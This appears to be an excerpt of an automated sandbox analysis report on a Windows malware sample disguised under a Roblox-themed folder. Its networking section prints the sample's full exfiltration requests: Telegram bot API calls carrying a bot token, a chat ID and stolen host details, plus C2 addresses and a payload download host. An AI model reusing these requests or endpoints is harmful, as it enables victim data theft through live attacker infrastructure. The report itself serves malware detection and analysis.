                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49744 version: TLS 1.2
                  Source: jqOHOuPMJP.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdbD966DD2-7850-423A-B1D8-7882CE1A6D15.log source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\system32\rsaenh.dll.pdb| source: vkefq4cv.oil.exe, 00000012.00000002.2077754048.0000010DF0DFF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Drawing.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2a source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*TOP-A source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: cmd.exe, 00000005.00000003.1850351981.0000022BB8350000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdbWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Drawing.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2S source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\vkefq4cv.oil.exe source: cmd.exe, 00000005.00000002.1851434800.0000022BB8158000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Core.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: mscorlib.pdb! source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Configuration.pdbx source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Windows.Forms.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD37000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831EneJ source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: winload_prod.pdbWINLOA~1.PDBWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*0 source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Management.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Drawing.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2E source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\Boss\Desktop\Laps\Laps\obj\Release\Laps.pdb source: jqOHOuPMJP.exe
                  Source: Binary string: System.Management.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Core.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831o source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831n source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbR source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD0C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: ntkrnlmp.pdbl source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeCode function: 4x nop then dec eax4_2_00007FFD9B9A5133
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax11_2_00007FFD9B974B99
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B981888h11_2_00007FFD9B981353
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B98016Dh11_2_00007FFD9B97FF54
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B974622h11_2_00007FFD9B973E71
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B98B834h11_2_00007FFD9B98B67A
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax11_2_00007FFD9B973DA8
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B9775FCh11_2_00007FFD9B9773F9
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B981FA1h11_2_00007FFD9B981A79
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97D1B7h11_2_00007FFD9B97C2B7
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax11_2_00007FFD9B97B97A
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B98E899h11_2_00007FFD9B98E668
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax11_2_00007FFD9B97F5EF
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97D1B7h11_2_00007FFD9B97CE3C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B9745F6h11_2_00007FFD9B974574
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B974622h11_2_00007FFD9B974574
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax18_2_00007FFD9B974B99
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97D197h18_2_00007FFD9B978B08
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97CA9Ch18_2_00007FFD9B978B08
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97CC93h18_2_00007FFD9B978B08
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B980CADh18_2_00007FFD9B980A2E
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax18_2_00007FFD9B97B95A
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B974622h18_2_00007FFD9B973E71
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B98B814h18_2_00007FFD9B98B678
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax18_2_00007FFD9B975E3E
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97EA38h18_2_00007FFD9B97E4AE
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B981F81h18_2_00007FFD9B981A59
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax18_2_00007FFD9B97F85F
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B98E879h18_2_00007FFD9B98E7BC
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97D197h18_2_00007FFD9B97CE1C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B9745F6h18_2_00007FFD9B974574
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B974622h18_2_00007FFD9B974574
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97771Ch18_2_00007FFD9B977519
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax42_2_00007FFD9B984B99
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax42_2_00007FFD9B986690
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B984622h42_2_00007FFD9B983E71
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B9845F6h42_2_00007FFD9B984574
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B984622h42_2_00007FFD9B984574
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B98771Ch42_2_00007FFD9B987519
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax44_2_00007FFD9B966AB0
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B96771Ch44_2_00007FFD9B967519
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax45_2_00007FFD9B996290
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B994622h45_2_00007FFD9B9945E1
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B9945F6h45_2_00007FFD9B994574
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B99730Ch45_2_00007FFD9B997109

                  Networking

                  barindex
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, type: DROPPED
                  Source: global trafficTCP traffic: 192.168.2.4:49738 -> 185.119.118.59:8080
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /byte/@jokerbot880901.txt HTTP/1.1Host: 82.147.85.194Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 82.147.85.194 82.147.85.194
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: ip-api.com
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
